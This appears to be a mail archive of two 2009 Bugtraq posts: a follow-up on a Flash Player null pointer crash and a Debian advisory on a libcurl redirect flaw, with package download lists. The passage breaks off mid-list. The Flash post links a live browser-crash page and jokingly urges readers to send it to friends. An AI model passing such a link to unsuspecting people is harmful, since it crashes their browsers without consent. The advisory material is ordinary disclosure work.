List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27687 invoked from network); 11 Mar 2009 17:38:06 -0000
MIME-Version: 1.0
In-Reply-To: <f1dcfaef0810011746paa14f6dta648aa5221b72ec5@mail.gmail.com>
References: <f1dcfaef0810011746paa14f6dta648aa5221b72ec5@mail.gmail.com>
Date: Wed, 11 Mar 2009 10:30:49 -0700
Message-ID: <f1dcfaef0903111030y5aefdb48o218689a260adbee6@mail.gmail.com>
Subject: Re: Adobe Flash Player plug-in null pointer dereference and browser 
crash
From: Matthew Dempsky <matthew@mochimedia.com>
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Status:   

On Wed, Oct 1, 2008 at 5:46 PM, Matthew Dempsky <matthew@mochimedia.com> wrote:
> If a Flash 9 SWF loads two SWF files with different SWF version
> numbers from two distinct HTTP requests to the exact same URL
> (including query string arguments), then Adobe's Flash Player plug-in
> will try to dereference a null pointer. �This issue affects at least
> versions 9.0.45.0, 9.0.112.0, 9.0.124.0, and 10.0.12.10 on Windows, OS
> X, and Linux.

As an update, this issue also affects 10.0.22.87 at least on Windows
and OS X.  I've seen some Linux distributions (e.g., [1]) claim that
10.0.22.87 fixes this bug (aka CVE-2008-4546), but I think this is
mistaken.

You can easily reproduce this bug (i.e., crash your browser) by
visiting http://flashcrash.dempsky.org/.  Be sure to tell your
friends: it can be the next Rick Roll.

[1] http://www.gentoo.org/security/en/glsa/glsa-200903-23.xml?style=printable

-- 
Matthew Dempsky
http://www.mochimedia.com

From - Wed Mar 11 18:11:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068fe
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39716-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 6AE3BED879
for <lists@securityspace.com>; Wed, 11 Mar 2009 18:02:08 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id E781714379E; Wed, 11 Mar 2009 14:39:08 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18773 invoked from network); 11 Mar 2009 16:49:32 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <nion@debian.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_HELO_IP=-2 (check from: .debian. - helo: .mo-p05-ob.rzone. - helo-domain: .rzone.)  FROM/MX_MATCHES_NOT_HELO(DOMAIN)=0 <client�.169.146.180> <helo=mo-p05-ob.rzone.de> <from=nion@debian.org> <to�bian-security-announce@lists.debian.org>, rate: -5
X-RZG-AUTH: :KHkJeFmIefYsEPPKCBl/ZNLv/wXfcKuujweZef2IiPbnG1Hpql+PuSVCX/jCuieKXNwX-RZG-CLASS-ID: mo05
Date: Wed, 11 Mar 2009 17:46:54 +0100
From: Nico Golde <nion@debian.org>
Message-ID: <20090311164654.GB23703@ngolde.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii; x-action=pgp-signed
Content-Disposition: inline
X-Mailer: netcat 1.10
X-GPG: 0x73647cff
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-9.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_1=1, IMPRONONCABLE_2=1, LDO_WHITELIST=-5,
MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1738-1] New curl packages fix arbitrary file access
Priority: urgent
Resent-Message-ID: <sOUS3ZWw9cP.A.x_.Yu-tJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Wed, 11 Mar 2009 16:49:28 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA-1738-1                    security@debian.org
http://www.debian.org/security/                                 Nico Golde
March 11th, 2009                        http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : curl
Vulnerability  : arbitrary file access
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2009-0037
Debian Bug     : 518423
BugTraq ID     : 33962

David Kierznowski discovered that libcurl, a multi-protocol file transfer
library, when configured to follow URL redirects automatically, does not
question the new target location.  As libcurl also supports file:// and
scp:// URLs - depending on the setup - an untrusted server could use that
to expose local files, overwrite local files or even execute arbitrary
code via a malicious URL redirect.

This update introduces a new option called CURLOPT_REDIR_PROTOCOLS which by
default does not include the scp and file protocol handlers.


For the oldstable distribution (etch) this problem has been fixed in
version 7.15.5-1etch2.

For the stable distribution (lenny) this problem has been fixed in
version 7.18.2-8lenny2.

For the unstable distribution (sid) this problem has been fixed in
version 7.18.2-8.1.

We recommend that you upgrade your curl packages.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2.dsc
    Size/MD5 checksum:      956 0a164bd43dbfb582a049fe3a737a375b
  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5.orig.tar.gz
    Size/MD5 checksum:  1897973 61997c0d852d38c3a85b445f4fc02892
  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2.diff.gz
    Size/MD5 checksum:    21635 47c30162c60f8192bce199f5fab0012d

Architecture independent packages:

  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dev_7.15.5-1etch2_all.deb
    Size/MD5 checksum:    22244 752d541336f513b3bfd0841e0868b472

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_alpha.deb
    Size/MD5 checksum:   166256 709d02b9dae8f4b0c7333d6f03c31628
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_alpha.deb
    Size/MD5 checksum:   816206 a36046c7827322a14d257bd3fb74010b
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_alpha.deb
    Size/MD5 checksum:   818778 967acf1522d86fdf56e84e1c5b22f147
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_alpha.deb
    Size/MD5 checksum:   809316 af0f20647d1a91d799dcbed6980428b7
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_alpha.deb
    Size/MD5 checksum:   181392 78c3b97fba2c35b5c5d1bf1eb5f1d908
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_alpha.deb
    Size/MD5 checksum:   174310 433c7e16f748f83db01989e8a249a101

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_amd64.deb
    Size/MD5 checksum:   164766 6f3f68c322aa54a5000975530ded729e
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_amd64.deb
    Size/MD5 checksum:   170058 f6fd6e8f7a3e030ca028a6750f666061
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_amd64.deb
    Size/MD5 checksum:   772142 5d3cdfcfdaf0604aeebfc395703d6df7
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_amd64.deb
    Size/MD5 checksum:   778626 490801518500a00caec9e45fb755c524
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_amd64.deb
    Size/MD5 checksum:   824964 a57398dfcbd49c33060a48671bed8a02
  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_amd64.deb
    Size/MD5 checksum:   163446 7eaaea76d628e03e8ebdc580bff0b72b

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_arm.deb
    Size/MD5 checksum:   756884 8eed02667e02867ad3d130a40ad4f330
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_arm.deb
    Size/MD5 checksum:   762352 b5720175a10c9f7333a2e8a298aac91d
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_arm.deb
    Size/MD5 checksum:   783552 72af9664d85d8aa4ca0960da19554333
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_arm.deb
    Size/MD5 checksum:   160536 c9fb486fd46228488f391d57a9d6edc8
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_arm.deb
    Size/MD5 checksum:   165914 b1188bf4e4da054e04b77c4e8f27ca73
  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_arm.deb
    Size/MD5 checksum:   162598 a60ef14833ef5f5bad0bffbda329e326

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_hppa.deb
    Size/MD5 checksum:   164866 73bdea9c0a854221204e7d232a464ad7
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_hppa.deb
    Size/MD5 checksum:   184262 c681c1b066c2210aa0d84f1763a14bdb
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_hppa.deb
    Size/MD5 checksum:   798798 29f2ee940a221a567c8f9568202f6f85
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_hppa.deb
    Size/MD5 checksum:   178932 76c87584e67d0e9957110bb805a15946
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_hppa.deb
    Size/MD5 checksum:   791220 9d0a1827c563e72951420d6e869a348f
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_hppa.deb
    Size/MD5 checksum:   815004 47b6884a2e5ce2224d64fdc9c5852325

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_i386.deb
    Size/MD5 checksum:   163604 16def6f8c4d5068be2bba466f89dc329
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_i386.deb
    Size/MD5 checksum:   759150 613d3cfa2de22d73706c4158f45a9380
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_i386.deb
    Size/MD5 checksum:   766468 c32cd1d31c6078d4676b8046ddc56f07
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_i386.deb
    Size/MD5 checksum:   168800 1fc225d65db9eb6508481bf2e5985d5d
  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_i386.deb
    Size/MD5 checksum:   163240 362b7152f99699f68c93ab89e821d8d0
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_i386.deb
    Size/MD5 checksum:   800506 984abe71ca0999c8a587ed1b0042299a

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_ia64.deb
    Size/MD5 checksum:   811254 1992183aa065d3782a2992ea98c22a5a
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_ia64.deb
    Size/MD5 checksum:   838550 350899a4e4f86a672aeb2c3a2d011e94
  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_ia64.deb
    Size/MD5 checksum:   174484 ac0a064f867f61c30ebd1cd7da6ea845
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_ia64.deb
    Size/MD5 checksum:   217504 032debd42a9a3cc08f65ee17097fe9d7
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_ia64.deb
    Size/MD5 checksum:   225458 a6beeb5551ffe3d09341160b368bf4f6
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_ia64.deb
    Size/MD5 checksum:   848606 b339d6517e49af9a30b5bed9a42c9222

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_mips.deb
    Size/MD5 checksum:   784292 439b960fc26cd382f86bbfb20478d7b0
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_mips.deb
    Size/MD5 checksum:   831916 dcfa7a779ae3cdac67cecf847dac0162
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_mips.deb
    Size/MD5 checksum:   792482 357d60661e80f1ee887d2345a119b547
  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_mips.deb
    Size/MD5 checksum:   164020 c91e5b7e745e2179301d2e75be7d8ee2
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_mips.deb
    Size/MD5 checksum:   165474 eff09f808ce9a23ce659aeeffea398f1
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_mips.deb
    Size/MD5 checksum:   170646 650b55f89ad5530208e49e211f5aebeb

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_mipsel.deb
    Size/MD5 checksum:   164056 b2cbeec53d1eef3e9d0e29adf797548b
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_mipsel.deb
    Size/MD5 checksum:   792108 4fe7f7e85d02706503d1064895607831
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_mipsel.deb
    Size/MD5 checksum:   165674 500cb0c319ee13c14f8d010b3c4457cc
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_mipsel.deb
    Size/MD5 checksum:   811082 c61871a4ac26252046b4e161aeef2dd7
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_mipsel.deb
    Size/MD5 checksum:   784546 b8ba2732071c34bbfe5c10927317f589
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_mipsel.deb
    Size/MD5 checksum:   170522 0919591347253f65b44ddea61f49cbc7

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_powerpc.deb
    Size/MD5 checksum:   774490 f804de8b26ea6914f0283f79f71d72b2
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_powerpc.deb
    Size/MD5 checksum:   781844 b53e33260b02761cd26c8780b8e81f2b
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_powerpc.deb
    Size/MD5 checksum:   173906 edf0a2342f93af56ffb18a45a934ace3
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_powerpc.deb
    Size/MD5 checksum:   841666 5df4b820f0f196560bd5796d0ad1bad7
  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_powerpc.deb
    Size/MD5 checksum:   165134 c62f63233f70e51a732c36492fd04ae9
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_powerpc.deb
    Size/MD5 checksum:   169130 44d2765d66141ceb6c6626750a098aaa

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_s390.deb
    Size/MD5 checksum:   836322 26db7bd743a5c2141c6aee251a9cede0
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_s390.deb
    Size/MD5 checksum:   179832 487db999849a4ac171d86d87d12d3f7f
  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_s390.deb
    Size/MD5 checksum:   163182 7be52b66b1f79a0d0f76d0183da4104a
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_s390.deb
    Size/MD5 checksum:   768888 87b9a0f806f25692cd2f9a30bd0be9eb
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_s390.deb
    Size/MD5 checksum:   172444 3d9a0b971714e2f9f6c7d15ce387bc93
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_s390.deb
    Size/MD5 checksum:   774446 9c7cf8ac1154f4b8b71615ad8d48ed99

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.15.5-1etch2_sparc.deb
    Size/MD5 checksum:   160204 433e751e98d9010f793cfacf4c809996
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.15.5-1etch2_sparc.deb
    Size/MD5 checksum:   788794 2c4e9c34ccf365fa02bc1f1657e68f35
  http://security.debian.org/pool/updates/main/c/curl/curl_7.15.5-1etch2_sparc.deb
    Size/MD5 checksum:   162412 1bab2e9e64b655babb5f1ef1b7271090
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-openssl-dev_7.15.5-1etch2_sparc.deb
    Size/MD5 checksum:   766110 cc724da5e7cc8b38376d1644d98a144e
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.15.5-1etch2_sparc.deb
    Size/MD5 checksum:   165224 671413f03a06041a824630be23ded9e9
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls-dev_7.15.5-1etch2_sparc.deb
    Size/MD5 checksum:   759596 2070bf93dadb3b3fe1aa387fb0f8e6c7

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2.diff.gz
    Size/MD5 checksum:    27675 3cc8e00a5145e9f8f35823f89170ed4e
  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2.dsc
    Size/MD5 checksum:     1418 02c706202a50b3358769c4c1e9f1a120
  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2.orig.tar.gz
    Size/MD5 checksum:  2273077 4fe99398a64a34613c9db7bd61bf6e3c

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_alpha.deb
    Size/MD5 checksum:   211250 dcccf85073a2826d5af6e6d438f6c9f6
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_alpha.deb
    Size/MD5 checksum:   224420 33ead51af60c4e6ea8f08b16ebde1e06
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_alpha.deb
    Size/MD5 checksum:   985930 c90004e19361846cbded2fb615eb60ec
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_alpha.deb
    Size/MD5 checksum:  1150080 c3436b5c4979764699a7236674df93cf
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_alpha.deb
    Size/MD5 checksum:   241558 7d28ddb21b9a23f2e4b6302dea9ffc36
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_alpha.deb
    Size/MD5 checksum:   957810 49c87cfe63e61d4c905c2c481b1a88a2

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_amd64.deb
    Size/MD5 checksum:   214620 3d0a0aa6453df3486b5910e198275f84
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_amd64.deb
    Size/MD5 checksum:  1182662 c7a8138e99e78dd772758e4d1db098fe
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_amd64.deb
    Size/MD5 checksum:   230526 1d8262e5c8ce1baddb748a76b836ff79
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_amd64.deb
    Size/MD5 checksum:   951202 76dd51652be02ad2972cbb32df9cbe60
  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_amd64.deb
    Size/MD5 checksum:   208912 e66d007bbedba4d7e838045e549c64b1
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_amd64.deb
    Size/MD5 checksum:   928736 6f66f5283ad91d0a2b4d56bd629e8305

armel architecture (ARM EABI)

  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_armel.deb
    Size/MD5 checksum:   223972 d139a82972490d1f706ec27cacddadac
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_armel.deb
    Size/MD5 checksum:   920298 d740b279b624e6a475cb7d391f7b2c10
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_armel.deb
    Size/MD5 checksum:   903750 c81c5db454d3263cd6ae51d16c933a6d
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_armel.deb
    Size/MD5 checksum:   209142 e9f8cea7ff20b90a27e1a72a523b3d47
  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_armel.deb
    Size/MD5 checksum:   209082 a906ad9c5f72efd9cdd561aed4ca8dc9
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_armel.deb
    Size/MD5 checksum:  1151506 7c7546f135977a859ddc976f73b6542d

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_hppa.deb
    Size/MD5 checksum:   939250 04c83feddcf78eaca8136bd4b15bee90
  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_hppa.deb
    Size/MD5 checksum:   209462 8e62f5740ba733a9a8cde83f045873e2
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_hppa.deb
    Size/MD5 checksum:   227528 9905b63e7ffb02e1b6da0443ad99bbf6
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_hppa.deb
    Size/MD5 checksum:   244642 f127b127e9783af96664f67fab940458
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_hppa.deb
    Size/MD5 checksum:   960844 5c3918da2bdb2bcb6e5775935d101600
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_hppa.deb
    Size/MD5 checksum:  1173380 ef0c131c585f50dd3b1d494be681ad4c

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_i386.deb
    Size/MD5 checksum:   903896 766d2afb93354dc6cfccc719ca5d3a32
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_i386.deb
    Size/MD5 checksum:   923838 54e2efa56e08277cd061ec142167b8f8
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_i386.deb
    Size/MD5 checksum:  1155810 b481158475101fe14cd7086dd09b00ba
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_i386.deb
    Size/MD5 checksum:   228434 806b581b9cb3e7b74b4c5b38d952d496
  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_i386.deb
    Size/MD5 checksum:   208184 310da7a3545fdd174ae3f7cf7a05d84e
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_i386.deb
    Size/MD5 checksum:   210964 fde8c7b507ef8fca75b3b95557443568

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_ia64.deb
    Size/MD5 checksum:   274076 a242056cc5928023e19189e0dad47a54
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_ia64.deb
    Size/MD5 checksum:  1165456 63a88f4853c990bf6a26744b25ffcd65
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_ia64.deb
    Size/MD5 checksum:   991418 a81c668fb270734005c855f77fbaa1b2
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_ia64.deb
    Size/MD5 checksum:   296182 959638d94a18a01ee393a5388af95e9a
  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_ia64.deb
    Size/MD5 checksum:   222326 8f7d1012c7920a818ff3387fd672582b
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_ia64.deb
    Size/MD5 checksum:  1019228 f1ee83304b03f4e168a3077577aee4ca

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_mips.deb
    Size/MD5 checksum:  1193134 69792abd2ebb8ae27741fd5380a15c7d
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_mips.deb
    Size/MD5 checksum:   227940 f59a95b1a51411e2df9f7646166b8bb0
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_mips.deb
    Size/MD5 checksum:   212670 38196676b77101edb8d75e050ccdfa83
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_mips.deb
    Size/MD5 checksum:   950332 3d0b559a946b285580c626796bd79619
  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_mips.deb
    Size/MD5 checksum:   208940 c4b370ba4637c34fb90b7241d94ad26e
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_mips.deb
    Size/MD5 checksum:   929246 a3250ee1c064f637f4f8b80fe67cc126

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_mipsel.deb
    Size/MD5 checksum:   208632 8e7b0faa4d0fcf82d4832c88040644a4
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_mipsel.deb
    Size/MD5 checksum:  1169800 fec90115dd8a0a4159eb0b32f9d2f547
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_mipsel.deb
    Size/MD5 checksum:   949916 4c476dd885c52cc5de342bf739d84f65
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_mipsel.deb
    Size/MD5 checksum:   212332 d9cccbe468c2228b96c662fab496a06e
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_mipsel.deb
    Size/MD5 checksum:   928636 b3e28a026e7deb8cce632c63b2a7a140
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_mipsel.deb
    Size/MD5 checksum:   227638 75ad8b0dd97c093ff56338d856df7383

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/c/curl/libcurl4-openssl-dev_7.18.2-8lenny2_powerpc.deb
    Size/MD5 checksum:   941020 0f242ff442fea24f03c33af08d9e6c75
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-dbg_7.18.2-8lenny2_powerpc.deb
    Size/MD5 checksum:  1179540 551daec15eb2ce16e000b2201dba167c
  http://security.debian.org/pool/updates/main/c/curl/curl_7.18.2-8lenny2_powerpc.deb
    Size/MD5 checksum:   212734 57c377e5cbef3618e283a1e187045598
  http://security.debian.org/pool/updates/main/c/curl/libcurl3_7.18.2-8lenny2_powerpc.deb
    Size/MD5 checksum:   238114 440e40511e414c3a0c3a4f4bfd479a41
  http://security.debian.org/pool/updates/main/c/curl/libcurl4-gnutls-dev_7.18.2-8lenny2_powerpc.deb
    Size/MD5 checksum:   922274 73c54c0b54c83950728f60d8cc1727ea
  http://security.debian.org/pool/updates/main/c/curl/libcurl3-gnutls_7.18.2-8lenny2_powerpc.deb
    Size/MD5 checksum:   222642 74220c8c71a4a5d9af54694d9777a9b0

s390 architecture (IBM S/390)

